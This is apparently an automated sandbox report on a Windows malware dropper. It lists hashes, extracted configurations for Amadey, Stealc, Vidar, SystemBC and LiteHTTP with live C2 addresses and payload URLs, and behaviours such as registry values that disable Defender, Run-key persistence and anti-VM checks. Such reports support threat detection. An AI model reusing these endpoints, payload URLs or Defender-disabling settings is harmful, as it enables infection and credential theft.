Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
06/03/2025, 02:07
Static task
static1
Behavioral task
behavioral1
Sample
a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe
Resource
win10v2004-20250217-en
General
-
Target
a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe
-
Size
3.0MB
-
MD5
831dc548d9e825728101443319ad693b
-
SHA1
57acc87997257d269bfe5cbeafe2cef792130c9c
-
SHA256
a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972
-
SHA512
0bc8e4182f6b3cbab8c8a40db9bb537dd66ebbf87fed1ae2c79d32b006d9670f5d6aab8ae0e18be2013a57a3bed7b435258cf853f61649cf2b784dbde35a521d
-
SSDEEP
98304:E/FI5ZJSC2thIjrHI8FCPS4GCwaHLDvV:Ukw5GCwarDvV
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
systembc
towerbingobongoboom.com
62.60.226.86
-
dns
5.132.191.104
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Extracted
vidar
ir7am
https://t.me/l793oy
https://steamcommunity.com/profiles/76561199829660832
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
Extracted
litehttp
v1.0.9
http://185.208.156.162/page.php
-
key
v1d6kd29g85cm8jp4pv8tvflvg303gbl
Signatures
-
Amadey family
-
Detect Vidar Stealer 4 IoCs
resource yara_rule behavioral2/memory/6024-1032-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/6024-1030-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/6024-1172-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/6024-1173-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/3960-774-0x0000000000F40000-0x000000000138E000-memory.dmp healer behavioral2/memory/3960-775-0x0000000000F40000-0x000000000138E000-memory.dmp healer behavioral2/memory/3960-860-0x0000000000F40000-0x000000000138E000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Litehttp family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" dd3907672e.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" dd3907672e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" dd3907672e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" dd3907672e.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection dd3907672e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" dd3907672e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" dd3907672e.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" dd3907672e.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications dd3907672e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" dd3907672e.exe -
Stealc family
-
Systembc family
-
Vidar family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 20 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ dd3907672e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ vertualiziren.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 721702bd23.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1590993906.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f9510b80e8.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ FvbuInU.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ v6Oqdnc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ OPC2VURIHUPRBGIGMXLLRVVJD.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ acdc33ee92.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0IR2HSX48POW1VIT6VA.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ be9629c306.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempSXNXTUO2YUFRJMDVXLUKTVUPGKSQEA6H.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 36bd318e4d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ovql.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 53 1496 powershell.exe 63 936 powershell.exe 305 5828 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2476 powershell.exe 3820 powershell.exe 532 powershell.exe 4264 powershell.exe 6544 powershell.exe 1496 powershell.exe 936 powershell.exe 5828 powershell.exe 5828 powershell.exe -
Downloads MZ/PE file 24 IoCs
flow pid Process 47 2940 rapes.exe 47 2940 rapes.exe 47 2940 rapes.exe 47 2940 rapes.exe 47 2940 rapes.exe 47 2940 rapes.exe 47 2940 rapes.exe 47 2940 rapes.exe 47 2940 rapes.exe 38 532 a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe 51 2576 Gxtuum.exe 53 1496 powershell.exe 118 440 1590993906.exe 87 3948 BitLockerToGo.exe 108 2568 BitLockerToGo.exe 234 2940 rapes.exe 234 2940 rapes.exe 234 2940 rapes.exe 234 2940 rapes.exe 234 2940 rapes.exe 234 2940 rapes.exe 234 2940 rapes.exe 234 2940 rapes.exe 63 936 powershell.exe -
Uses browser remote debugging 2 TTPs 7 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 5444 chrome.exe 2600 chrome.exe 2476 msedge.exe 1768 msedge.exe 6732 msedge.exe 5716 chrome.exe 4000 chrome.exe -
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral2/files/0x0009000000023dd2-1018.dat net_reactor behavioral2/memory/5796-1028-0x0000000000B80000-0x0000000000BE0000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 40 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ovql.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dd3907672e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion OPC2VURIHUPRBGIGMXLLRVVJD.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempSXNXTUO2YUFRJMDVXLUKTVUPGKSQEA6H.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 36bd318e4d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion acdc33ee92.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dd3907672e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f9510b80e8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0IR2HSX48POW1VIT6VA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0IR2HSX48POW1VIT6VA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion OPC2VURIHUPRBGIGMXLLRVVJD.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion vertualiziren.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion acdc33ee92.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ovql.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion FvbuInU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1590993906.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion vertualiziren.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 721702bd23.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempSXNXTUO2YUFRJMDVXLUKTVUPGKSQEA6H.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 36bd318e4d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion FvbuInU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f9510b80e8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 721702bd23.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1590993906.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion be9629c306.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion be9629c306.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation OPC2VURIHUPRBGIGMXLLRVVJD.exe Key value queried \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation nhDLtPT.exe Key value queried \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation PcAIvJ0.exe -
Drops startup file 3 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe zY9sqWs.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe zY9sqWs.exe -
Executes dropped EXE 39 IoCs
pid Process 2140 OPC2VURIHUPRBGIGMXLLRVVJD.exe 2940 rapes.exe 4280 nhDLtPT.exe 2576 Gxtuum.exe 4464 e3d77cfb89.exe 3564 vertualiziren.exe 3036 rapes.exe 3716 Gxtuum.exe 3948 TempSXNXTUO2YUFRJMDVXLUKTVUPGKSQEA6H.EXE 1200 721702bd23.exe 916 483d2fa8a0d53818306efeb32d3.exe 3988 bc3a1e6a75.exe 3636 bc3a1e6a75.exe 4684 bc3a1e6a75.exe 628 36bd318e4d.exe 2688 acdc33ee92.exe 440 1590993906.exe 3740 0IR2HSX48POW1VIT6VA.exe 4428 be9629c306.exe 3108 22e7923b7d.exe 1496 rapes.exe 936 Gxtuum.exe 2916 ovql.exe 3960 dd3907672e.exe 5204 nhDLtPT.exe 6036 Ps7WqSx.exe 5296 FvbuInU.exe 5796 mAtJWNv.exe 6024 mAtJWNv.exe 2484 ce4pMzk.exe 1212 MCxU5Fj.exe 220 MCxU5Fj.exe 3340 MCxU5Fj.exe 4584 v6Oqdnc.exe 3960 PcAIvJ0.exe 4288 zY9sqWs.exe 4760 f9510b80e8.exe 6348 rapes.exe 6356 Gxtuum.exe -
Identifies Wine through registry keys 2 TTPs 20 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine OPC2VURIHUPRBGIGMXLLRVVJD.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine TempSXNXTUO2YUFRJMDVXLUKTVUPGKSQEA6H.EXE Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine 1590993906.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine 0IR2HSX48POW1VIT6VA.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine dd3907672e.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine FvbuInU.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine f9510b80e8.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine be9629c306.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine vertualiziren.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine 721702bd23.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine ovql.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine 36bd318e4d.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine acdc33ee92.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine v6Oqdnc.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features dd3907672e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" dd3907672e.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\be9629c306.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109140101\\be9629c306.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\22e7923b7d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109150101\\22e7923b7d.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dd3907672e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109160101\\dd3907672e.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\EX0eXUWS\\Anubis.exe\"" ce4pMzk.exe Set value (str) \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e3d77cfb89.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108470101\\e3d77cfb89.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108480121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1590993906.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109130101\\1590993906.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 380 pastebin.com 381 pastebin.com -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0008000000023d16-68.dat autoit_exe behavioral2/files/0x0007000000023d70-384.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 20 IoCs
pid Process 532 a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe 2140 OPC2VURIHUPRBGIGMXLLRVVJD.exe 2940 rapes.exe 3564 vertualiziren.exe 3036 rapes.exe 3948 TempSXNXTUO2YUFRJMDVXLUKTVUPGKSQEA6H.EXE 1200 721702bd23.exe 916 483d2fa8a0d53818306efeb32d3.exe 628 36bd318e4d.exe 2688 acdc33ee92.exe 440 1590993906.exe 3740 0IR2HSX48POW1VIT6VA.exe 4428 be9629c306.exe 1496 rapes.exe 2916 ovql.exe 3960 dd3907672e.exe 5296 FvbuInU.exe 4584 v6Oqdnc.exe 4760 f9510b80e8.exe 6348 rapes.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 3988 set thread context of 4684 3988 bc3a1e6a75.exe 134 PID 1200 set thread context of 3948 1200 721702bd23.exe 141 PID 628 set thread context of 2568 628 36bd318e4d.exe 144 PID 5796 set thread context of 6024 5796 mAtJWNv.exe 180 PID 1212 set thread context of 3340 1212 MCxU5Fj.exe 186 -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job OPC2VURIHUPRBGIGMXLLRVVJD.exe File created C:\Windows\Tasks\Gxtuum.job nhDLtPT.exe File created C:\Windows\Tasks\Test Task17.job vertualiziren.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 3312 3988 WerFault.exe 132 2460 5796 WerFault.exe 179 1664 1212 WerFault.exe 184 -
System Location Discovery: System Language Discovery 1 TTPs 54 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language OPC2VURIHUPRBGIGMXLLRVVJD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nhDLtPT.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bc3a1e6a75.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language be9629c306.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nhDLtPT.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempSXNXTUO2YUFRJMDVXLUKTVUPGKSQEA6H.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1590993906.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ovql.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e3d77cfb89.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ps7WqSx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vertualiziren.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 36bd318e4d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language acdc33ee92.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dd3907672e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zY9sqWs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f9510b80e8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 721702bd23.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bc3a1e6a75.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 22e7923b7d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FvbuInU.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 22e7923b7d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MCxU5Fj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language v6Oqdnc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0IR2HSX48POW1VIT6VA.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 22e7923b7d.exe -
Checks processor information in registry 2 TTPs 13 IoCs
Processor information is often read in order to detect sandboxing environments.
